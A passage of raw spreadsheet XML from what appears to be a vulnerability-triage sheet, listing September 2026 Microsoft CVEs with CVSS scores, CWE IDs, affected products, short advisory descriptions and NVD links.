t="inlineStr"><is><t>New</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-69291</t></is></c><c r="D136" s="5" t="n"><v>8.800000000000001</v></c><c r="E136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.006</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr" /><c r="K136" s="5" t="inlineStr" /><c r="L136" s="5" t="inlineStr" /><c r="M136" s="5" t="inlineStr" /><c r="N136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P136" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q136" s="5" t="inlineStr" /><c r="R136" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S136" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-69334</t></is></c><c r="D137" s="5" t="n"><v>8.800000000000001</v></c><c r="E137" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F137" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.008</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr" /><c r="L137" s="5" t="inlineStr" /><c r="M137" s="5" t="inlineStr" /><c r="N137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P137" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q137" s="5" t="inlineStr" /><c r="R137" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S137" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-69355</t></is></c><c r="D138" s="5" t="n"><v>8.800000000000001</v></c><c r="E138" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.008</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr" /><c r="M138" s="5" t="inlineStr" /><c r="N138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P138" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q138" s="5" t="inlineStr" /><c r="R138" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S138" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>CVE-2026-69360</t></is></c><c r="D139" s="5" t="n"><v>8.800000000000001</v></c><c r="E139" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="n"><v>0.008</v></c><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" /><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr" /><c r="M139" s="5" t="inlineStr" /><c r="N139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q139" s="5" t="inlineStr" /><c r="R139" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S139" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>CVE-2026-69386</t></is></c><c r="D140" s="5" t="n"><v>8.800000000000001</v></c><c r="E140" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="n"><v>0.008</v></c><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr" /><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr" /><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q140" s="5" t="inlineStr" /><c r="R140" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S140" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>CVE-2026-69434</t></is></c><c r="D141" s="5" t="n"><v>8.800000000000001</v></c><c r="E141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="n"><v>0.008</v></c><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr" /><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q141" s="5" t="inlineStr" /><c r="R141" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S141" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>CVE-2026-69439</t></is></c><c r="D142" s="5" t="n"><v>8.800000000000001</v></c><c r="E142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="n"><v>0.007</v></c><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr" /><c r="M142" s="5" t="inlineStr" /><c r="N142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P142" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q142" s="5" t="inlineStr" /><c r="R142" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S142" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>CVE-2026-69442</t></is></c><c r="D143" s="5" t="n"><v>8.800000000000001</v></c><c r="E143" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="n"><v>0.008</v></c><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L143" s="5" t="inlineStr" /><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P143" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q143" s="5" t="inlineStr" /><c r="R143" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S143" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>CVE-2026-69461</t></is></c><c r="D144" s="5" t="n"><v>8.800000000000001</v></c><c r="E144" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="n"><v>0.008</v></c><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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 s="5" t="inlineStr" /><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P144" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q144" s="5" t="inlineStr" /><c r="R144" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S144" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>CVE-2026-69464</t></is></c><c r="D145" s="5" t="n"><v>8.800000000000001</v></c><c r="E145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="n"><v>0.008999999999999999</v></c><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K145" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L145" s="5" t="inlineStr" /><c r="M145" s="5" t="inlineStr" /><c r="N145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P145" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q145" s="5" t="inlineStr" /><c r="R145" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S145" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>CVE-2026-69465</t></is></c><c r="D146" s="5" t="n"><v>8.800000000000001</v></c><c r="E146" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="n"><v>0.008</v></c><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K146" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L146" s="5" t="inlineStr" /><c r="M146" s="5" t="inlineStr" /><c r="N146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P146" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q146" s="5" t="inlineStr" /><c r="R146" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S146" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>CVE-2026-69485</t></is></c><c r="D147" s="5" t="n"><v>8.800000000000001</v></c><c r="E147" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr" /><c r="K147" s="5" t="inlineStr" /><c r="L147" s="5" t="inlineStr" /><c r="M147" s="5" t="inlineStr" /><c r="N147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P147" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q147" s="5" t="inlineStr" /><c r="R147" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S147" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>CVE-2026-69494</t></is></c><c r="D148" s="5" t="n"><v>8.800000000000001</v></c><c r="E148" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="n"><v>0.008</v></c><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr" /><c r="K148" s="5" t="inlineStr" /><c r="L148" s="5" t="inlineStr" /><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q148" s="5" t="inlineStr" /><c r="R148" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S148" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>CVE-2026-69495</t></is></c><c r="D149" s="5" t="n"><v>8.800000000000001</v></c><c r="E149" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="n"><v>0.008</v></c><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr" /><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q149" s="5" t="inlineStr" /><c r="R149" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S149" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C150" s="5" t="inlineStr"><is><t>CVE-2026-69499</t></is></c><c r="D150" s="5" t="n"><v>8.800000000000001</v></c><c r="E150" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="n"><v>0.008</v></c><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr" /><c r="M150" s="5" t="inlineStr" /><c r="N150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P150" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q150" s="5" t="inlineStr" /><c r="R150" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S150" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>CVE-2026-69511</t></is></c><c r="D151" s="5" t="n"><v>8.800000000000001</v></c><c r="E151" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="n"><v>0.008</v></c><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr" /><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr" /><c r="M151" s="5" t="inlineStr" /><c r="N151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P151" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q151" s="5" t="inlineStr" /><c r="R151" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S151" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>CVE-2026-69518</t></is></c><c r="D152" s="5" t="n"><v>8.800000000000001</v></c><c r="E152" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="n"><v>0.008</v></c><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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2" s="5" t="inlineStr" /><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q152" s="5" t="inlineStr" /><c r="R152" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S152" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>CVE-2026-69522</t></is></c><c r="D153" s="5" t="n"><v>8.800000000000001</v></c><c r="E153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="n"><v>0.008</v></c><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr" /><c r="M153" s="5" t="inlineStr" /><c r="N153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P153" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q153" s="5" t="inlineStr" /><c r="R153" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S153" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>CVE-2026-69529</t></is></c><c r="D154" s="5" t="n"><v>8.800000000000001</v></c><c r="E154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="n"><v>0.005</v></c><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr" /><c r="K154" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L154" s="5" t="inlineStr" /><c r="M154" s="5" t="inlineStr" /><c r="N154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P154" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q154" s="5" t="inlineStr" /><c r="R154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S154" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>CVE-2026-69547</t></is></c><c r="D155" s="5" t="n"><v>8.800000000000001</v></c><c r="E155" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="n"><v>0.008999999999999999</v></c><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr" /><c r="L155" s="5" t="inlineStr" /><c r="M155" s="5" t="inlineStr" /><c r="N155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P155" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q155" s="5" t="inlineStr" /><c r="R155" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S155" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>CVE-2026-69551</t></is></c><c r="D156" s="5" t="n"><v>8.800000000000001</v></c><c r="E156" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="n"><v>0.008999999999999999</v></c><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr" /><c r="L156" s="5" t="inlineStr" /><c r="M156" s="5" t="inlineStr" /><c r="N156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q156" s="5" t="inlineStr" /><c r="R156" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S156" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>CVE-2026-69556</t></is></c><c r="D157" s="5" t="n"><v>8.800000000000001</v></c><c r="E157" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F157" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="n"><v>0.008</v></c><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L157" s="5" t="inlineStr" /><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P157" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q157" s="5" t="inlineStr" /><c r="R157" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S157" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>CVE-2026-69598</t></is></c><c r="D158" s="5" t="n"><v>8.800000000000001</v></c><c r="E158" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F158" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="n"><v>0.008</v></c><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr" /><c r="K158" s="5" t="inlineStr" /><c r="L158" s="5" t="inlineStr" /><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P158" s="5" 